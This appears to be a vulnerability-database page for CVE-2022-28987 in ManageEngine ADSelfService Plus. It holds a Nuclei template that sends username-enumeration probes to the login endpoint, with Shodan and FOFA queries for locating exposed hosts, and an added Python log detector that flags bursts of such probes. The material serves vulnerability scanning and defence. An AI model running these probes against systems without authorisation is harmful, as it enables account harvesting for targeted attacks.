| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2022-28987 | 20 May 2022 03:15 | – | attackerkb |
| CVE-2022-28987 | 20 May 2022 07:30 | – | circl |
| ZOHO ManageEngine ADSelfService Plus security vulnerability | 20 May 2022 00:00 | – | cnnvd |
| CVE-2022-28987 | 20 May 2022 02:10 | – | cve |
| CVE-2022-28987 | 20 May 2022 02:10 | – | cvelist |
| EUVD-2022-33418 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2022-28987 | 20 May 2022 03:15 | – | nvd |
| CVE-2022-28987 | 20 May 2022 03:15 | – | osv |
| Design/Logic Flaw | 20 May 2022 03:15 | – | prion |
| PT-2022-19345 | 20 May 2022 00:00 | – | ptsecurity |
```yaml
id: CVE-2022-28987

info:
  name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
  impact: |
    Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
  remediation: |
    Update to version 6202 or later.
  reference:
    - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28987
    epss-score: 0.09705
    epss-percentile: 0.94914
    cwe-id: CWE-203
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.title:"ADSelfService Plus"
    fofa-query: title="ADSelfService Plus"
  tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice,vkev

http:
  # Two probes: a name that cannot exist and a well-known account name.
  # The blank line after the headers is required so loginName is sent as the body.
  - raw:
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=asdfnonexistent
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=Guest

    # Either distinguishing JSON status string marks the host as affected.
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Permission Denied")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Your account has been disabled")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220167ffa80a6eb52f1cb0d41732c412254305473e40c6a8b18c9cb1ebb5a5d108f022057fb8a33a2dd2d93255ef3263cbab5c95e3bffa9e7be6932b6e28afb9cdce9e8:922c64590222798bb761d5b6d8e72950
```
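The template above confirms the flaw from the outside; on the server side, the same weakness shows up as one client sending many POSTs to `/ServletAPI/accounts/login` in a short window, since each probe tests one username. The following detector is an added example, not part of the Vulners record or the Nuclei project: it parses combined-format access log lines and flags clients whose POSTs to that endpoint exceed a threshold inside a sliding time window. The log lines, client addresses, threshold and window length are constructed for illustration; only the endpoint path comes from the template.

```python
"""Flag bursts of POSTs to the ADSelfService Plus login/forgot-password
endpoint in web-server access logs (added example; log format, IPs and
thresholds are constructed, the endpoint path is the one in the template).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

ENDPOINT = "/ServletAPI/accounts/login"   # path probed by the Nuclei template

# Apache/nginx "combined"-style line: client ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path")


def detect_enumeration(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: peak_count} for clients whose POSTs to ENDPOINT exceed
    `threshold` within any sliding window of length `window`."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                      # skip lines the regex cannot read
        ip, ts, method, path = parsed
        if method == "POST" and path.split("?", 1)[0] == ENDPOINT:
            hits[ip].append(ts)

    flagged = {}
    for ip, stamps in hits.items():
        stamps.sort()
        peak, start = 0, 0
        # Two-pointer sweep: widest run of timestamps within one window.
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged


# Constructed sample: one client fires 12 POSTs in 33 s, another posts twice
# ten minutes apart, plus an unrelated GET and an unparseable line.
SAMPLE_LOG = [
    f'203.0.113.7 - - [20/May/2022:03:15:{sec:02d} +0000] '
    f'"POST {ENDPOINT} HTTP/1.1" 200 143 "-" "Mozilla/5.0"'
    for sec in range(0, 36, 3)
] + [
    '198.51.100.4 - - [20/May/2022:03:10:00 +0000] '
    '"POST /ServletAPI/accounts/login HTTP/1.1" 200 143 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/May/2022:03:20:00 +0000] '
    '"POST /ServletAPI/accounts/login HTTP/1.1" 200 143 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/May/2022:03:20:05 +0000] '
    '"GET /favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, peak in detect_enumeration(SAMPLE_LOG).items():
        print(f"possible username enumeration from {ip}: "
              f"{peak} POSTs to {ENDPOINT} within 60s")
```

The path is compared after stripping any query string so that cache-busting parameters do not defeat the match, and the threshold applies to a sliding window rather than a fixed minute bucket so that a burst straddling a minute boundary is still counted as one burst. A legitimate user who mistypes a name a few times stays well under the threshold, which is why the count, not the mere presence of a failed lookup, is the signal.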